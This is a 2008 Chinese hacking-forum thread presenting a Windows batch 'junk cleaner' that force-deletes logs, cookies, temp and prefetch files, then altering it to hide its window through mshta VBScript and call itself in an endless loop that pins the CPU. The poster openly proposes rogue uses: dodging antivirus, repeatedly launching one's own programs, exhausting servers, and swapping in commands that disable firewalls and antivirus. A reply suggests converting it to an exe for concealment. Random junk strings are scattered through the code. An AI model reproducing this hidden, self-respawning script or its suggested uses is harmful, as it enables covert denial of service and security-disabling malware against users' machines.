【3.A.S.T】网络安全爱好者 » 原创专区 » 【原创】再谈垃圾清除的批处理和其流氓运用！

平湖秋月 发表于 2008-9-13 23:51

【原创】再谈垃圾清除的批处理和其流氓运用！

[size=5][b]大家经常会看到这个垃圾清除的的BAT程序，也就是很多人所说的30秒清除所有的系统他及程序    说实话这个批处理效果确实不错 ，速度快而且不重不漏！系统这下减了不少肥。不过我觉得这个BAT还是有点不很完善，要是能够自动检测系统中的垃圾文件并且删除那该多好啊！[/b][/size]X m,Epo0Zx/U
a.bat源代码如下：F m W
zIv9R?f
[color=#003366][b][color=royalblue][/color]
'_/Jx6J4iMW8E:U
HAk9{u/\ ===可以直接保存改名a.bat=====================eP E#v nt%RA bR
@echo off
[}6pFdr echo 正在清除系统垃圾文件，请稍等...... [5]'~8@h.tP4S3w
@del /f /s /q %systemdrive%\*.tmp
m6c.C;astZ2Q @del /f /s /q %systemdrive%\*._mp 0|k5{L4ZC/E.XM"l!o
@del /f /s /q %systemdrive%\*.log
2m `$sO9u%d5A'v @del /f /s /q %systemdrive%\*.gid j.t(K^$_ w2p
@del /f /s /q %systemdrive%\*.chk
EU9lo-Y$zt @del /f /s /q %systemdrive%\*.old Sm1TP5E Lb3h/E!x
@del /f /s /q %systemdrive%\recycled\*.* %Pd3[y-f
@del /f /s /q %windir%\*.bak
v3ey `x @del /f /s /q %windir%\prefetch\*.*
5n1ioVgg ]6B @rd /s /q %windir%\temp & md %windir%\temp ,XIq,[`M&s
@del /f /q %userprofile%\cookies\*.*
f"G(\}AL @del /f /q %userprofile%\recent\*.*
"eqN7X;`K"r @ @del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
QbP(d C l] @del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
hqDAtZi} @del /f /s /q "%userprofile%\recent\*.*"
6RFPwT5]c echo 清除系统LJ完成！[/b][/color] S!|z7x.^'Z
[size=5]其实简单的一句话便实现了那个功能，在“echo 清除系统LJ完成！”后面加上一句 “call a.bat”就OK了，命令的意思大家都懂，我就不做解释了！我运行了一下，到是能够自动检测和删除了，而且关掉对话框也简单，直接关闭就行了！但是如果 被当作入侵工具却又点太暴露，并且那个DOS框始终不能隐藏，很容易被发现.这该怎么办？想想批处理里面的命令，貌似没见到有隐藏对话框的用法（如果有请告诉指教一下！我的QQ：118122875），于是到网上找了一下，决定用VBS代码实现，于是又加上了下面的代码，其实也很简单，也就加了一句话进去：[/size]J ^]8X%c Z
]f%S:QF?*eD
[color=#ff0000][b]===可以直接保存改名为a.bat[size=2][color=#0000ff](一定要是a.bat哦具体说明原因你应该明白吧======[/color]
*S!Cd9f!~X&N0z\;z!R [/size]@echo off
+D0{3J`p if "%1" == "h" goto begin
J sy z-i mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit{1v*uX+vb3L
:begin
(W:f,W^1I#ft5hC echo 正在清除系统垃圾文件，请稍等......
q\1kU QgY @@del /f /s /q %systemdrive%\*.tmp
y[9j&Z@2o @del /f /s /q %systemdrive%\*._mp
/~(} V'J"Sf/{t @del /f /s /q %systemdrive%\*.log Ic yY#Q3N)u
@del /f /s /q %systemdrive%\*.gid N)kT8Z9p2o
@del /f /s /q %systemdrive%\*.chk
-T#Yn&Z$pij @del /f /s /q %systemdrive%\*.old
Km:L SQFF @del /f /s /q %systemdrive%\recycled\*.*
%^~#^1P'N4g D @del /f /s /q %windir%\*.bak
*IcE&r1]6Q @del /f /s /q %windir%\prefetch\*.* )O5Tc~+T|
@rd /s /q %windir%\temp & md %windir%\temp
8l/^r@HN @del /f /q %userprofile%\cookies\*.* V@zc&LF
@del /f /q %userprofile%\recent\*.*
{Sg7Pc7Z9r2@ @del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*" ^'IG|f_?
@del /f /s /q "%userprofile%\Local Settings\Temp\*.*" +D}{.sT)G
@del /f /s /q "%userprofile%\recent\*.*" !i*w2{&F._S
echo 清除系统LJ完成！
P5@4c0t8A.L;h call a.bat[/b][/color] a/VO,j-Y:f2x![p
[size=4][color=#ff0000]运行看看！什么效果？[/color][/size]?:c7y+A/xU@
[size=4]对话框消失了！打开任务管理器查看显示CPU运用：100%    看进程里面cmd.exe占用CPU：99     本来想删除这个进程，但是哪晓得点右键准备去删除那个cmd.exe，没有想到不见了，然后仔细一看，其实cmd.exe没有不见，但是已经PID不一样了，也就表示一个循环已经进行完毕,还没等你来的结束进程就已经进入下一个循环，这时候有的朋友会想可以用taskkill命令来删除进程，但是PID几乎是每2秒换一次，你的速度有那么快？！目前我还没找到解决的办法（高手请指教），无赖只好重新启动...哎！其实这都是雕虫小技，只不过是最基础的东西，但是有的时候最简单的也是最要命的！[/size]h,edA A8c0` by
+i1L(Ut5vV;pk
[size=4][color=#ff0000]你说，我们可以利用这个BAT做些什么：[/color][/size]N@ISh
oh6WbS Vu
[size=4]1.因为bat文件可以躲过杀软！这样利用它的无限循环启动一些你自己的程序，当然咯，重复的循环安装时没有必要的，我只是打个比方，你可以自己改动代码达到自己的目的！ i-Fmx6Rku
2.它循环使用消耗资源，如果这样的程序多弄几个，全部启动.你说服务器会怎么样？

dz.@^)KyR 3.如果我把里面的删除垃圾文件的代码换成关闭防护墙/杀毒和开系统端口和服务的代码，那不是更好？当然这些应用都是我个人的一些分析，没有真正的实验过，我想一个可以成功的通过～不过，这个小东西还有个美中不足，cmd.exe在进程里面看得到，至于怎么隐藏，那就请各位高手指教了，在下刚刚接触批处理，莱鸟一个，有什么不对的地方和我联系啊！我的QQ：118122875 平湖秋月[/size]

上帝的爱 发表于 2008-9-14 05:03

想法非常不错

柔肠寸断 发表于 2008-9-14 17:34

打个岔，流氓的应用，呵呵

柔肠寸断 发表于 2008-9-14 17:38

现在来正经的回答下问题：A@/red
1、在bat下隐藏对话框，可以使用一个参数的，但是我记不得了-s M+l(Ae

(z&_0V9E"J$l kE 2、可以将bat转换成exe格式的文件啊，使用bat2exe,下次我找到了就发出来哈

问道小生 发表于 2008-9-14 19:03

其实这个批处理还有一个问题，就是把log文件一律也作为垃圾处理了~~~'Uyq L#a.^1}9ts4o
部分软件卸载是需要log文件的，删除了它，就会造成软件无法正常卸载，或者卸载不干净。因此，log文件并不是垃圾，不同软件计录的log文件有着不同的作用，有的甚至是非常重要的，不是可以随便删除的，例如：一张CD碟片就有一个log日志文件，它主要记录EAC对CD抓轨的各项参数。

平湖秋月 发表于 2008-9-15 21:43

楼上的你们说的都有道理 理论上是成立的 我有时间试试看

查看完整版本: 【原创】再谈垃圾清除的批处理和其流氓运用！